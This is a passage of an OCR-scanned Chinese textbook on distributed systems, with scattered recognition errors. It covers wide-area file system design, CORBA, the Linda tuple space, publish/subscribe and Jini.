隐藏 在 Web 背 后 的 基本 思想 是 ， 使 一 个 分 布 式 系统 看 起 来 像 一 个 巨大 的 、 超 链接 的 集合 。 另 一 种 处 
理 方式 则 是 使 一 个 分 布 式 系统 看 起 来 像 一 个 大 型 文件 系统 。 在 这 一 节 中 ， 我 们 将 考察 一 些 与 设计 一 个 广 
域 文件 系统 有 关 的 问题 。 

分 布 式 系统 采用 一 个 文件 系统 模型 意味 着 只 存在 一 个 全 局 文件 系统 ， 全 世界 的 用 户 都 能 够 读 写 他 们 
各 自 具 有 授权 的 文件 。 通 过 一 个 进程 将 数据 写 入 文件 而 另 一 个 进程 把 数据 读 出 的 办 法 可 以 实现 通信 。 由 
此 产生 了 标准 文件 系统 中 的 许多 问题 ， 但 是 也 有 一 些 与 分 布 性 相关 的 新 问题 。 

1. 传输 模式 

第 一 个 问题 是 ， 在 上 传 /下 载 模式 (upload/download model) 和 远程 访问 模式 之 间 的 选择 问题 。 在 
前 一 种 模式 中 ， 如 图 8-36a 所 示 ， 通 过 把 远程 服务 器 上 的 文件 复制 到 本 地 的 方法 ， 实 现 进程 对 远程 文件 
的 访问 。 如 果 只 是 需要 读 该 文件 ， 考 虑 到 高 性 能 的 需要 ， 就 在 本 地 读 出 该 文件 。 如 果 需 要 写 人 该 文件 ， 
就 在 本 地 写 人 。 进 程 完成 工作 之 后 ， 把 更 新 后 的 文件 送 回 原来 的 服务 器 。 在 远程 访问 模式 中 ， 文 件 停留 
在 服务 器 上 ， 而 客户 机 向 服务 器 发 出 命令 并 在 服务 器 上 完成 工作 ， 如 图 8-36b 所 示 。 


1 客户 机 取 文件 


客户 机 | BSS 旧 文 件 客户 机 服务 器 
新 文件 Ў. | шш 
Н А = и 
3. 当 客户 机 完成 
2. 访 问 在 客户 工作 时 ， 文 件 被 文件 留 在 
机 上 完成 ОТ шше 
а) b) 


图 8-36 а) 上 传 /下 载 模式 ，b) 远程 访问 模式 


上 传 /下 载 模式 的 优点 是 简单 ， 而 且 一 次 性 传送 整个 文件 的 方法 比 用 小 块 传送 文件 的 方法 效率 更 高 。 
其 缺点 是 为 了 在 本 地 存放 整个 文件 ， 必 须 拥 有 是 够 的 空间 ， 即 使 只 需要 文件 的 一 部 分 也 要 移动 整个 文件 ， 
这 样 做 显然 是 一 种 浪费 ， 而 且 如 果 有 多 个 并 发 用 户 则 会 产生 一 致 性 问题 。 
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2. 目录 层次 

文件 只 是 所 涉及 的 问题 中 的 一 部 分 。 另 一 部 分 问题 是 目录 系统 。 所 有 的 分 布 式 系统 都 支持 有 多 个 文 
件 的 目录 。 接 下 来 的 设计 问题 是 ， 是 否 所 有 的 用 户 都 拥有 该 目录 层次 的 相同 视图 。 图 8-37 中 的 例子 正好 
表达 了 我 们 的 意思 。 在 图 8-37a 中 有 两 个 文件 服务 器 ， 每 个 服务 器 有 三 个 目录 和 一 些 文件 。 在 图 8-37b 中 
有 一 个 系统 ， 其 中 所 有 的 客户 (以 及 其 他 机 器 ) 对 该 分 布 式 文件 系统 拥有 相同 的 视图 。 如 果 在 某 台 机 器 
上 路 径 /D/E/x 是 有 效 的 ， 则 该 路 径 对 所 有 其 他 的 客户 也 是 有 效 的 。 

相反 ， 在 图 8-37c 中 ， 不 同 的 机 器 有 该 文件 系统 的 不 同 视图 。 重 复 先 前 的 例子 ， 路 径 /D/E/x 可 能 在 客 
户 机 1 上 有 效 ， 但 是 在 客户 机 2 上 无 效 。 在 通过 远程 安装 方式 管理 多 个 文件 服务 器 的 系统 中 ， 图 8-37c 是 
一 个 典型 示例 。 这 样 既 灵 活 又 可 直接 实现 ， 但 是 其 缺点 是 ， 不 能 使 得 整个 系统 行为 像 单一 的 、 旧 式 分 时 
系统 。 在 分 时 系统 中 ， 文 件 系统 对 任何 进程 都 是 一 样 的 ， 如 图 8-37b 中 的 模型 。 这 个 属性 显然 使 得 系统 
容易 编程 和 理解 。 

一 个 密切 相关 的 问题 是 ， 是 否 存在 一 个 所 有 的 机 器 都 承认 的 全 局 根 目录 。 获 得 全 局 根 目录 的 一 个 方 
法 是 ， 让 每 个 服务 器 的 根 目录 只 包含 一 个 目录 项 。 在 这 种 情况 下 ， 路 径 取 /server/path 的 形式 ， 这 种 方 
式 有 其 缺点 ， 但 是 至 少 做 到 了 在 系统 中 处 处 相同 。 


文件 服务 器 1 客户 机 1 客户 机 1 


图 8-37 а) 两 个 文件 服务 器 。 和 矩形 代表 目录 ， 圆 围 代表 文件 ，bj 所 有 客户 机 都 有 
相同 文件 系统 视图 的 系统 ，c) 不 同 的 客户 机 可 能 会 有 不 同文 件 系统 视图 的 系统 


3. 命名 透明 性 

这 种 命名 方式 的 主要 问题 是 ， 它 不 是 完全 透明 的 。 这 里 涉及 两 种 类 型 的 透明 性 (transparency)， 并 
且 有 必要 加 以 区 分 。 第 一 种 ， 位 置 造 明 性 (location transparency) ， 其 含义 是 路 径 名 没有 隐 含 文件 所 在 位 
置 的 信息 。 类 似 于 /serverl/dirl/dir2/x 的 路 径 告诉 每 个 人 ，x 是 在 服务 器 1 上 ， 但 是 并 没有 说 明 该 服务 器 在 
哪里 。 在 网 络 中 该 服务 器 可 以 随意 移动 ， 而 该 路 径 名 却 不 必 改 动 。 所 以 这 个 系统 具有 位 置 透明 性 。 

但 是 ， 假 设 文件 非常 大 而 在 服务 器 1 上 的 空间 又 很 紧张 。 进 而 ， 如 果 在 服务 器 2 上 有 大 量 的 空间 ， 
那么 系统 也 许 会 自动 地 将 x 从 1 移 到 服务 器 2 上 。 不 幸 地 ， 当 整个 路 径 名 的 第 一 个 分 量 是 服务 器 时 ， 即 使 
dir1 和 dir2 在 两 个 服务 器 上 都 存在 ， 系 统 也 不 能 将 文件 自动 地 移动 到 其 他 的 服务 器 上 。 问 题 在 于 ， 让 文 
件 自动 移动 就 得 将 其 路 径 名 从 /server1/dir1/dir2/x 改 变 成 为 /server2/dir1/dir2/x 。 如 果 路 径 改 变 了 ， 那 么 
在 内 部 拥有 前 一 个 路 径 字符 串 的 程序 就 会 停止 工作 。 如 果 在 一 个 系统 中 文件 移动 时 文件 的 名 称 不 会 随 之 
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改变 ， 则 称 为 具有 位 置 独立 性 (location independence) 。 将 机 器 或 服务 器 名 称 戏 在 路 径 名 中 的 分 布 式 系 
统 显然 不 具有 位 置 独立 性 。 一 个 基于 远程 安装 (HER) 的 系统 当然 也 不 具有 位 置 独立 性 ， 因 为 在 把 某 个 
文件 从 一 个 文件 组 (安装 单元 ) 移 到 另 一 个 文件 组 时 ， 是 不 可 能 仍旧 使 用 原来 的 路 径 名 的 。 可 见 位 置 独 
立 性 是 不 容易 实现 的 ， 但 它 是 分 布 式 系统 所 期 望 的 一 个 属性 。 

这 里 把 前 面 讨 论 过 的 内 容 加 以 简要 的 总 结 ， 在 分 布 式 系统 中 处 理 文件 和 目录 命名 的 方式 通常 有 以 下 三 种 ; 

1) 机 器 + 路 径 名 ， 如 ,machine/path 或 machine:path。 

2) 将 远程 文件 系统 安装 在 本 地 文件 层次 中 。 

3) 在 所 有 的 机 器 上 看 来 都 相同 的 单一 名 字 空间 。 
前 两 种 方式 很 容易 实现 , 特别 是 作为 将 原本 不 是 为 分 布 式 应 用 而 设计 的 已 有 系统 连接 起 来 的 方式 时 是 这 样 。 
而 第 三 种 方式 的 实现 则 是 困难 的 ， 并 且 需 要 仔细 的 设计 ， 但 是 它 能 够 减轻 了 程序 员 和 用 户 的 负担 。 

4. 文 件 共享 的 语义 

当 两 个 或 多 个 用 户 共享 同一 个 文件 时 ， 为 了 避免 出 现 问 题 有 必要 精确 地 定义 读 和 写 的 语义 。 在 单 处 
理 器 系统 中 ， 通 常 ， 语 义 是 如 下 表述 的 ， 在 一 个 read 系 统 调 用 跟随 一 个 write 系统 调用 时 ， 则 read 返 回 
刚才 写 人 的 值 ， 如 图 8-38a 所 示 。 类 似 地 ， 当 两 个 write 连续 出 现 ， 后 跟随 一 个 read 时 ， 则 读 出 的 值 是 后 
一 个 写 操作 所 存 入 的 值 。 实 际 上 ， 系 统 强制 所 有 的 系统 调用 有 序 ， 并 且 所 有 的 处 理 器 都 看 到 同样 的 顺序 。 
我 们 将 这 种 模型 称 为 顺序 一 致 性 (sequential consistency), 

在 分 布 式 系统 中 ， 只 要 只 有 一 个 文件 服务 器 而 且 客户 机 不 缓存 文件 ， 那 么 顺序 一 致 性 是 很 容易 实现 
的 。 所 有 的 read 和 write 直接 发 送 到 这 个 文件 服务 器 上 ， 而 该 服务 器 严格 地 按 顺 序 执行 它们 。 

不 过 ， 实 际 情况 中 ， 如 果 所 有 的 文件 请 求 都 必须 送 到 单 台 文 件 服务 器 上 处 理 ， 那 么 这 个 分 布 式 系统 
的 性 能 往往 会 很 精 糕 。 这 个 问题 可 以 用 如 下 方式 来 解决 ， 即 让 客户 机 在 其 私有 的 高 速 缓存 中 保留 经 常 使 
用 文件 的 本 地 副本 。 但 是 ， 如 果 客 户 机 1 修改 了 在 本 地 高 速 缓存 中 的 文件 ， 而 紧 接 着 客户 机 2 从 服务 器 
上 读 取 该 文件 ， 那 么 客户 机 2 就 会 得 到 一 个 已 经 过 时 的 文件 ， 如 图 8-38b 所 示 。 


客户 机 1 


单 处 理 器 25A" LIRA “ab” 
Т. БА “с” 原始 
文件 文件 服务 器 
EO 
© 
2.460 “abe” 


客户 机 2 (3:00 7807 


b) 
图 8-38 а) 顺序 一 致 性 ，b) 在 一 个 带 有 高 速 缓存 的 分 布 式 系统 中 ， 读 文件 可 能 会 返回 一 个 废弃 的 值 
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走出 这 个 困 局 的 一 个 途径 是 ， 将 高 速 缓存 文件 上 的 改动 立即 传送 回 服务 器 。 尽 管 概 念 上 很 简单 ， 但 
这 个 方法 却 是 低 效 率 的 。 另 一 个 解决 方案 是 放宽 文件 共享 的 语义 。 一 般 的 语义 要 求 一 个 读 操作 要 看 到 其 
之 前 的 所 有 写 操作 的 效果 ， 我 们 可 以 定义 一 条 新 规则 来 取代 它 ;“ 在 一 个 打开 文件 上 所 进行 的 修改 ， 最 
初 仅 对 进行 这 些 修改 的 进程 是 可 见 的 。 只 有 在 该 文件 关闭 之 后 ， 这 些 修改 才 对 其 他 进程 可 见 。” 采 用 这 
样 一 个 规则 不 会 改变 在 图 8-38b 中 发 生 的 事件 ， 但 是 这 条 规则 确实 重新 定义 了 所 谓 正确 的 具体 操作 行为 
(B 得 到 了 文件 的 原始 值 )。 当 客户 机 1 关闭 文件 时 ， 它 将 一 个 副本 回 送 给 服务 器 ， 因 此 ， 正 如 所 期 望 的 ， 
后 续 的 read 操 作 得 到 了 新 的 值 。 实 际 上 ， 这 个 规则 就 是 图 8-36 中 的 上 传 /下 载 模式 。 这 种 语义 已 经 得 到 广 
证 的 实现 ， 即 所 谓 的 会 话语 义 (session semantic), 

使 用 会 话语 义 产生 了 新 的 问题 ， 即 如 果 两 个 或 更 多 的 客户 机 同时 缓存 并 修改 同一 个 文件 ， 应 该 怎么 
办 ? 一 个 解决 方案 是 ， 当 每 个 文件 依次 关闭 时 ， 其 值 会 被 送 回 给 服务 器 ， 所 以 最 后 的 结果 取决 于 哪个 文 
件 最 后 关闭 。 一 个 不 太 令 人 满意 的 、 但 是 较 容易 实现 的 替代 方案 是 ， 最 后 的 结果 是 在 各 种 候选 中 选择 一 
个 ,但 并 不 指定 是 哪 一 个 。 

对 会 话语 义 的 另 一 种 处 理 方式 是 ， 使 用 上 传 /下 载 模式 ， 但 是 自动 对 已 经 下 载 的 文件 加 锁 。 其 他 试 
图 下 载 该 文件 的 客户 机 将 被 挂 起 直到 第 一 个 客户 机 返回 。 如 果 对 某 个 文件 的 操作 要 求 非常 多 ， 服 务 器 可 
以 向 持 有 该 文件 的 客户 机 发 送 消息 ， 询 问 是 否 可 以 加 快速 度 ， 不 过 这 样 做 可 能 没有 作用 。 总 而 言 之 , E 
确 地 实现 共享 文件 的 语义 是 一 件 刺 手 的 事情 ， 并 不 存在 一 个 优雅 和 有 效 的 解决 方案 。 


84.5 基于 对 象 的 中 间 件 

现在 让 我 们 考察 第 三 种 范 型 。 这 里 不 再 说 一 切 都 是 文档 或 者 一 切 都 是 文件 ， 取 而 代 之 ， 我 们 会 说 一 
切 都 是 对 象 。 对 象 是 变量 的 集合 ， 这 些 变量 与 一 套 称 为 方法 的 访问 过 程 绑 定 在 一 起 。 进 程 不 允许 直接 访 
问 这 些 变量 。 相 反 ， 要 求 它们 调用 方法 。 

有 一 些 程序 设计 语言 ， 如 C++ 和 Java， 是 面向 对 象 的 ， 但 这 些 对 象 是 语言 级 的 对 象 ， 而 不 是 运行 时 
刻 的 对 象 。 一 个 知名 的 基于 运行 时 对 象 的 系统 是 CORBA (公共 对 象 请 求 代理 体系 结构 ，Common Object 
Request Broker Architecture) (Vinoski, 1997), CORBA 是 一 个 客户 机 -服务 器 系统 ， 其 中 在 客户 机 上 的 
客户 进程 可 以 调用 位 于 (可 能 是 远程 ) 服务 器 上 的 对 象 操作 。 CORBA 是 为 运行 不 同 硬件 平台 和 操作 系 
统 的 异 构 系统 而 设计 的 ， 并 且 用 各 种 语言 编写 。 为 了 使 在 一 个 平台 上 的 客户 有 可 能 使 用 在 不 同 平台 上 的 
服务 器 ， 将 ORB (对 象 请 求 代理 ，Object Request Вгокег) 插入 到 客户 机 和 服务 器 之 间 ， 从 而 使 它们 相 
互 匹配 。ORB 在 CORBA 中 扮演 着 重要 的 角色 ， 以 至 于 连 该 系统 也 采用 了 这 个 名 称 。 

每 个 CORBA 对 象 是 由 叫做 IDL (接口 定义 语言 ，Interface Definition Language) 的 语言 中 的 接口 定 
义 所 定义 的 ， 说 明 该 对 象 提 供 什么 方法 ， 以 及 每 个 方法 期 望 使 用 什么 类 型 的 参数 。 可 以 把 IDL 的 规约 
(specification) 编译 进 客 户 端 桩 过 程 中 ， 并 且 存 储 在 一 个 库 里 。 如 果 一 个 客户 机 进程 预先 知道 它 需要 访 
问 某 个 对 象 ， 这 个 进程 则 与 该 对 象 的 客户 端 柱 代 码 链接 。 也 可 以 把 IDL 规 约 编译 进 服务 器 一 方 的 一 个 框 
Ж (skeleton) 过 程 中 。 如 果 不 能 提前 知道 进程 需要 使 用 哪 一 个 CORBA 对 象 ， 进行 动态 调用 也 是 可 能 的 ， 
但 是 有 关 动 态 调用 如 何 工作 的 原理 则 不 在 本 书 的 讲述 范围 内 。 

当 创 建 一 个 CORBA 对 象 时 ， 一 个 对 它 的 引用 也 创建 出 来 并 返回 给 创建 它 的 进程 。 该 引用 涉及 进程 如 
何 标识 该 对 象 以 便 随后 对 其 方法 进行 调用 。 该 引用 还 可 以 传递 给 其 他 的 进程 或 存储 在 一 个 对 象 目录 中 。 

要 调用 一 个 对 象 中 的 方法 ， 客 户 机 进程 必须 首先 获得 对 该 对 象 的 引用 。 引用 可 以 直接 来 源 于 创建 进 
程 ， 或 更 有 可 能 是 ， 通过 名 字 寻 找 或 通过 功能 在 某 类 目录 中 寻找 。 一 旦 有 了 该 对 象 的 引用 ， 客户 机 进程 
将 把 方法 调用 的 参数 编排 进 一 个 便利 的 结构 中 ， 然后 与 客户 机 ORB 联 系 。 接 着 ， 客 户 机 ORB 向 服务 器 
ORB 发 送 一 条 消息 ， 后 者 真正 调用 对 象 中 的 方法 。 整 个 机 制 类 似 于 RPC。 

ORB 的 功能 是 将 客户 机 和 服务 器 代码 中 的 所 有 低层 次 的 分 布 和 通信 细节 都 隐藏 起 来 。 特别 地 ， 客 户 
机 的 ORB 隐 藏 了 服务 器 的 位 置 、 服 务 器 是 二 进 制 代码 还 是 脚本 、 服务 器 在 什么 硬件 和 操作 系统 上 运行 、 
有 关 对 象 当 前 是 否 是 活动 的 以 及 两 个 ORB 是 如 何 通信 的 (例如 ， TCP/IP、RPC、 共 享 内 存 等 )。 

在 第 一 版 CORBA 中 ， 没有 规定 客户 机 ORB 和 服务 器 ORB 之 间 的 协议 。 结果 导致 每 一 个 ORB 的 销售 
商都 使 用 不 同 的 协议 ， 其 中 的 任何 两 个 协议 之 间 都 不 能 彼此 通信 。 在 2.0 版 中 ， 规 定 了 协议 。 对 于 用 在 
Internet 上 的 通信 ， 协 议 称 为 [IOP (Internet InterOrb Protocol) 。 
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为 了 能 够 在 CORBA 系 统 中 使 用 那些 不 是 为 CORBA 编 写 的 对 象 ， 可 以 为 每 个 对 象 装备 一 个 对 象 适 配 
器 (object adapter)。 对 象 适配器 是 一 种 包装 器 ， 它 处 理 诸如 登记 对 象 、 生 成 对 象 引 用 以 及 激发 一 个 在 
被 调用 时 处 于 未 活动 状态 的 对 象 等 琐碎 事务 。 所 有 这 些 与 CORBA 有 关 部 分 的 布局 如 图 8-39 所 示 。 


客户 机 客户 机 存根 Ше, 服务 器 
客户 机 | 服务 器 
代码 代码 
对 象 适 
配器 


М 


图 8-39 基于 CORBA 的 分 布 式 系统 中 的 主要 元 素 (CORBA 部 件 由 灰色 表示 ) 


对 于 CORBA 而 言 ， 一 个 严重 问题 是 每 个 CORBA 对 象 只 存在 一 个 服务 器 上 ， 这 意味 着 那些 在 世界 各 
地 客户 机 上 被 大 量 使 用 的 对 象 ， 会 有 很 差 的 性 能 。 在 实践 中 ，CORBA 只 在 小 规模 系统 中 才能 有 效 工 作 ， 
比如 ， 在 一 台 计 算 机 、 一 个 局 域 网 或 者 一 个 公司 中 用 来 连接 进程 。 


8.4.6 基于 协作 的 中 间 件 

分 布 式 系统 的 最 后 一 个 范 型 是 所 谓 基于 协作 的 中 间 件 (coordination-based middleware)。 我 们 将 从 
Linda 系 统 开始 ， 这 是 一 个 开启 了 该 领域 的 学 术 性 研究 项 目 。 然 后 考察 主要 由 该 项 目 所 激发 的 两 个 商业 
案例 ，pubilsh/subscribe 以 及 Jini。 

1. Linda 

Linda 是 一 个 由 耶鲁 大 学 的 David Gelernter 和 他 的 学 生 Nick Carriero (Carriero 与 Gelernter , 1986, 
Carriero 与 Gelernter，1985) 研发 的 用 于 通信 和 同步 的 新 系统 。 在 Linda 系 统 中 ， 相 互 独立 的 进程 之 间 通过 
一 个 抽象 的 元 组 空间 (tuple space) 进行 通信 。 对 整个 系统 而 言 ， 元 组 空间 是 全 局 性 的 ， 在 任何 机 器 上 的 
进程 都 可 以 把 元 组 插 人 或 移出 元 组 空间 ， 而 不 用 考虑 它们 是 如 何 存放 的 以 及 存放 在 何 处 。 对 于 用 户 而 言 ， 
元 组 空间 像 一 个 巨大 的 全 局 共享 存储 器 ， 如 同 我 们 前 面 已 经 看 到 的 ( 见 图 8-21c) 各 种 类 似 的 形式 。 

一 个 元 组 类 似 于 C 语 言 或 者 Java 中 的 结构 。 它 包括 一 个 或 多 个 域 ， 每 个 域 是 一 个 由 基 语 言 (base 
language) (通过 在 已 有 的 语言 ， 如 C 语 言 中 添加 一 个 库 , 可 Гы 
以 实现 Linda) 所 支持 的 某 种 类 型 的 值 。 对 于 C-Linda， 域 的 Cmatrix-1", 1, 6, 3.14) Р ө 
类 型 包括 整数 、 长 整数 、 浮 点 数 以 及 诸如 数组 (包括 字符 串 ) | СТУ? esister，Stephany，Robera 
和 结构 (但 是 不 含有 其 他 的 元 组 ) 之 类 的 组 合 类 型 。 与 对 象 图 8-40 三 个 Linda 的 元 组 
不 同 ， 元 组 是 纯粹 的 数据 ， 它 们 没有 任何 相关 联 的 方法 。 在 
图 8-40 中 给 出 了 三 个 元 组 的 示例 。 

在 元 组 上 存在 四 种 操作 。 第 一 种 out， 将 一 个 元 组 放 入 元 组 空间 中 。 例 如 ， 

out("abc", 2, 5); 
该 操作 将 元 组 ("abc", 2, 5) 放 入 到 元 组 空间 中 。out 的 域 通常 是 常数 、 变 量 或 者 是 表达 式 ， 例 如 

out("matrix-1",i, j, 3.14); 
输出 一 个 带 有 四 个 域 的 元 组 ， 其 中 的 第 二 个 域 和 第 三 个 域 由 变量 i 和 j 的 当前 值 所 决定 。 

通过 使 用 ip 原 语 可 以 从 元 组 空间 中 获取 元 组 。 该 原 语 通过 内 容 而 不 是 名 称 或 者 地 址 寻找 元 组 。in 的 
域 可 以 是 表达 式 或 者 形式 参数 。 例 如 ， 考 虑 

їп("аһс", 2,71); 
这 个 操作 在 元 组 空间 中 “查询 ”包含 字符 串 “abc"、 整 数 2 以 及 在 第 三 个 域 中 含有 任意 整数 (假设 是 束 
Ж) 的 元 组 。 如 果 发 现 了 ， 则 将 该 元 组 从 元 组 空间 中 移出 ， 并 且 把 第 三 个 域 的 值 赋予 变量 i。 这 种 匹配 
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和 移出 操作 是 原子 性 的 ， 所 以 ， 如 果 两 个 进程 同时 执行 in 操作 ， 只 有 其 中 一 个 会 成 功 ， 除 非 存在 两 个 或 
更 多 的 匹配 元 组 。 在 元 组 空间 中 甚至 可 以 有 同一 个 元 组 的 多 个 副本 存在 。 

in 采用 的 匹配 算法 是 很 直接 的 。in 原 语 的 域 ， 称 为 模板 (template) ，( 在 概念 上 ) 它 与 元 组 空间 中 
的 每 个 元 组 的 同一 个 域 相 比 较 ， 如 果 下 面 的 三 个 条 件 都 符合 ， 那 么 产生 出 一 个 匹配 : 

1) 模板 和 元 组 有 相同 数量 的 域 。 

2) 对 应 域 的 类 型 一 样 。 

3) 模板 中 的 每 个 常数 或 者 变量 均 与 该 元 组 域 相 匹配 。 
形式 参数 ， 由 问号 标识 后 面 跟随 一 个 变量 名 或 类 型 所 给 定 ， 并 不 参与 匹配 (除了 类 型 检查 例外 )， 尽 管 
在 成 功 匹 配 之 后 ， 那 些 含有 一 个 变量 名 称 的 形式 参数 会 被 赋值 

如 果 没 有 匹配 的 元 组 存在 ， 调 用 进程 便 被 挂 起 ， 直 到 另 一 个 进程 插入 了 所 需要 的 元 组 为 止 ， 此 时 该 
调用 进程 自动 复活 并 获得 新 的 元 组 。 进 程 阻塞 和 自动 解除 阻塞 意味 着 ， 如 果 一 个 进程 与 输出 一 个 元 组 有 
关 而 另 一 个 进程 与 输入 一 个 元 组 有 关 ， 那 么 谁 在 先是 无 关 紧要 的 。 惟 一 的 差别 是 ， 如 果 in 在 out 之 前 被 调 
用 了 ， 那 么 会 有 少许 的 延 时 存在 ， 直 到 得 到 元 组 为 止 。 

在 某 个 进程 需要 一 个 不 存在 的 元 组 时 ， 阻 塞 该 进程 的 方式 可 以 有 许多 用 途 。 例 如 ， 该 方式 可 以 用 于 
信号 量 的 实现 。 为 了 要 建立 信号 量 S 或 在 信号 量 S 上 执行 一 个 up 操作 ， 进 程 可 以 执行 如 下 操作 


out("semaphore $"); 


要 执行 一 个 down 操 作 ， 可 以 进行 

in("semaphore S"); 

在 元 组 空间 中 ("semaphore 5") 元 组 的 数量 决定 了 信号 量 S 的 状态 。 如 果 信 号 量 不 存在 ， 任何 要 获得 信 
号 量 的 企图 都 会 被 阻塞 ， 直 到 某 些 其 他 的 进程 提供 一 个 为 止 。 

除了 out 和 in 操作 ，Linda 还 提供 了 原 语 read， 它 和 in 是 一 样 的 ， 不 过 它 不 把 元 组 移出 元 组 空间 。 还 有 
一 个 原 语 eval， 它 的 作用 是 同时 对 元 组 的 参数 进行 计算 ， 计 算 后 的 元 组 会 被 放 进 元 组 空间 中 去 。 可 以 利 
用 这 个 机 制 完成 一 个 任意 的 运算 。 以 上 内 容 说 明了 怎样 在 Linda 中 创建 并 行 的 进程 。 

2. 发 布 /订阅 (Pubilsh/Subscribe) 

由 于 受到 Linda 的 启发 ， 出 现 了 基于 协作 的 模型 的 一 个 例子 ， 称 作 pubilsh/subscribe (Oki 等 人 ， 
1993)。 它 由 大 量 通过 广播 网 网 络 互联 的 进程 组 成 。 每 个 进程 可 以 是 一 个 信息 生产 者 、 信 息 消费 者 或 两 
者 都 是 。 

当 一 个 信息 生产 者 有 了 一 条 新 的 信息 〈 例 如， 一 个 新 的 股票 价格 ) 后 ， 它 就 把 该 信息 作为 一 个 元 组 
在 网 络 上 广播 。 这 种 行为 称 为 发 布 〔publishing)。 在 每 个 元 组 中 有 一 个 分 层 的 主题 行 ， 其 中 有 多 个 用 加 
点 (英文 句号 ) 分 隔 的 域 。 对 特定 信息 感 兴趣 的 进程 可 以 订阅 (subscribe) 特定 的 专题 ， 这 包括 在 主题 
行 中 使 用 通配符 。 在 同一 台 机 器 上 ， 只 要 通知 一 个 元 组 守护 进程 就 可 以 完成 订阅 工作 ， 该 守护 进程 监测 
已 出 版 的 元 组 并 查找 所 需要 的 专题 。 

发 布 /订阅 的 实现 过 程 如 图 8-41 所 示 。 当 一 个 进程 需要 发 布 一 个 元 组 时 ， 它 在 本 地 局 域 网 上 广播。 在 每 
台 机 器 上 的 元 组 守护 进程 则 把 所 有 的 已 广播 的 元 组 复制 进入 其 RAM。 然 后 检查 主题 行 看 看 哪些 进程 对 它 感 
兴趣 ， 并 给 每 个 感 兴趣 的 进程 发 送 一 个 该 元 组 的 副本 。 元 组 也 可 以 在 广域网 上 或 Internet 上 进行 广播 ， 这 种 
做 法 可 以 通过 将 每 个 局 域 网 中 的 一 台 机 器 变 作 信息 路 由 器 ， 用 来 收集 所 有 已 发 布 的 元 组 然后 转送 到 其 他 
的 局 域 网 上 再 次 广播 的 方法 来 实现 。 这 种 转送 方法 也 可 以 进行 得 更 为 聪明 ， 即 只 把 元 组 送 给 至 少 有 一 个 
需要 该 元 组 的 订阅 者 的 远程 局 域 网 。 不 过 要 做 到 这 一 点 ， 需要 使 用 信息 路 由 器 交换 有 关 订 阅 者 的 信息 。 

这 里 可 以 实现 各 种 语义 ， 包 括 可 靠 发 送 以 及 保证 发 送 ， 即 使 出 现 崩溃 也 没有 关系 。 在 后 一 种 情形 下 ， 
有 必要 存储 原 有 的 元 组 供 以 后 需要 时 使 用 。 一 种 存储 的 方法 是 将 一 个 数据 库 系统 和 该 系统 挂钩 ， 并 让 该 
数据 库 订 阅 所 有 的 元 组 。 这 可 以 通过 把 数据 库 封装 在 一 个 适配器 中 实现 ， 从 而 允许 一 个 已 有 的 数据 库 以 
发 布 /订阅 模型 工作 。 当 元 组 们 经 过 时 ， 适 配器 就 一 一 抓 取 它 们 并 把 它们 放 进 数据 库 中 。 

发 布 /订阅 模型 完全 把 生产 者 和 消费 者 分 隔 开 来 ， 如 同 在 Linda 中 一 样 。 但 是 ， 有 的 时 候 还 是 有 必要 
知道 ， 另 外 还 有 谁 对 某 种 信息 感 兴趣 。 这 种 信息 可 以 用 如 下 的 方法 来 收集 ， 发 布 一 个 元 组 ， 它 只 询问 ， 
“ 谁 对 信息 x 有 兴趣 ?”"。 以 元 组 形式 的 响应 会 是 :“ 我 对 x 有 兴趣 。” 
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图 8-41 发 布 /订阅 的 体系 结构 


3. Jini 

50 多 年 来 ， 计 算 始终 是 以 CPU 为 中 心 的 ， 一 台 计算 机 就 是 一 个 独立 的 装置 ， 包 括 一 个 CPU、 一 些 基 
本 存储 器 、 并 总 是 有 诸如 硬盘 等 这 样 一些 大 容量 的 存储 器 。Sun 公 司 的 Jini (基因 拼写 的 变形 ) 则 是 企 
图 改变 这 种 计算 模型 的 一 个 尝试 ， 这 种 模型 可 以 描述 为 以 网 络 为 中 心 (Waldo, 1999), 

在 Jini 世 界 中 有 大 基 自 包含 的 Jini 设 备 ， 其 中 的 每 一 个 设备 都 为 其 他 的 设备 提供 了 一 种 或 多 种 服务 。 
可 以 把 Jini 设 备 插入 到 网 络 中， 并 且 立 即 开始 提供 和 使 用 服务 ， 这 并 不 需要 复杂 的 安装 过 程 。 请 注意 ， 
这 些 设备 是 被 插入 到 网 络 中 ， 而 不 是 如 同 传统 那样 插入 到 计算 机 中 。 一 个 Jini 设 备 可 以 是 一 台 传统 的 计 
算 机 ， 但 也 可 以 是 一 台 打 印 机 、 掌 上 电脑 、 蜂 窝 电话 、 电 视 机 、 立 体 音响 或 其 他 带 有 CPU、 一 些 存储 器 
以 及 一 个 〈 可 能 是 无 线 ) 网 络 连接 的 设备 。Jini 系 统 是 Jini 设 备 的 一 个 松散 联邦 ，Jini 设 备 可 以 依照 自己 
的 意愿 进入 和 离开 该 联邦 ， 不 存在 集权 式 的 管理 。 

当 一 个 Jini 设 备 想 加 入 Jini 联 邦 时 ， 它 在 本 地 局 域 网 上 广播 一 个 包 ， 或 者 在 本 地 无 线 蜂窝 网 上 询问 是 
否 存在 查询 服务 (lookup service)。 用 于 寻找 查询 服务 的 协议 是 发 现 协议 (discovery protocol) ARE 
FJini 硬 线 协 议 中 的 某 一 个 。( 另 一 种 寻找 方法 是 ， 新 的 Jini 设 备 可 以 等 待 直 到 有 一 个 周期 性 的 查询 服务 
， 但 是 我 们 不 会 在 这 里 讨论 这 种 机 制 ) 。 

当 查 询 服务 看 到 有 一 个 新 的 设备 想 注册 时 ， 它 用 一 段 可 以 用 来 完成 注册 的 代码 作为 回答 。 由 于 Jini 
是 纯 的 Java 系 统 ， 被 发 送 的 代码 是 JVM (java 虚拟 机 语言 ) 形式 的 ， 所 有 的 Jini 设 备 必定 能 运行 它 ， 通 党 
是 以 解释 方式 运行 。 接 着 ， 新 设备 运行 该 代码 ， 代 码 同 查询 服务 联系 并 且 在 某 个 固定 的 时 间 段 中 进行 注 
册 。 在 该 时 间 段 失效 之 前 ， 如 果 有 意愿 ， 该 设备 就 可 以 注册 。 这 一 机 制 意味 着 ， 一 个 Jini 设备 可 以 通过 
关机 的 方式 离开 系统 ， 有 关 该 设备 的 曾经 存在 的 状态 很 快 就 会 被 遗忘 掉 ， 不 需要 任何 集中 性 的 管理 。 注 
册 一 定 的 时 间 间 隔 的 做 法 ， 称 为 取得 一 项 租约 (lease), 

请 注意 ， 由 于 用 于 注册 设备 的 代码 是 通过 下 载 进入 设备 的 ， 因 此 注册 用 的 代码 会 随 着 系统 演化 而 被 
